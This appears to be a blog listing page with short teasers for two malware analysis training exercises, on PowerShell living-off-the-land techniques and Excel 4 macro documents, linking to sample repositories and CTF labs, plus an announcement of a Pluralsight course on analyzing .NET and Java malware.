Malware Analysis Exercise – Living Off the Land with Powershell

It is common for threat actors to utilize living off the land (LOTL) techniques, such as the execution of PowerShell to further their attacks and transition from macro code. This lab is intended to show how you can often times perform quick analysis to extract important IOCs. While there may be several ways to answer these questions the focus on this exercise is on static techniques for analysis. You can find the exercise, artifacts and full walk-through on my Github at https://github.com/jstrosch/malware-samples/tree/master/malware_analysis_exercises/2020/December Looking for more of a challenge? Try this on CyberDefenders as part of their CTF! https://cyberdefenders.org/labs/51

Read more

Malware Analysis Exercise – Getting Started with Excel 4 Macros

Recently, we have seen a resurgence of Excel-based malicious office documents. However, instead of using VBA-style macros, they are using older style Excel 4 macros. This changes our approach to analyzing these documents, requiring a slightly different set of tools. In this challenge, you’ll get hands-on with two documents that use Excel 4.0 macros to perform anti-analysis and download the next stage of the attack. You can find the exercise, artifacts and full walk-through on my Github at https://github.com/jstrosch/malware-samples/tree/master/malware_analysis_exercises/2021/February. Looking for more of a challenge? Try this on CyberDefenders as part of their CTF! https://cyberdefenders.org/labs/55

Read more

First Pluralsight course now live!

I’m excited to announce that my first Pluralsight course Analyzing Malware for .NET and Java Binaries is now live! You can find the course at the following URL – http://www.pluralsight.com/courses/dotnet-java-binaries-analyzing-malware. The ability to quickly analyze software is a critical skill for anyone handling malware. This course will teach you techniques for reverse engineering Java and .NET binaries, how to generate indicators of compromise and get hands on with malware.

Read more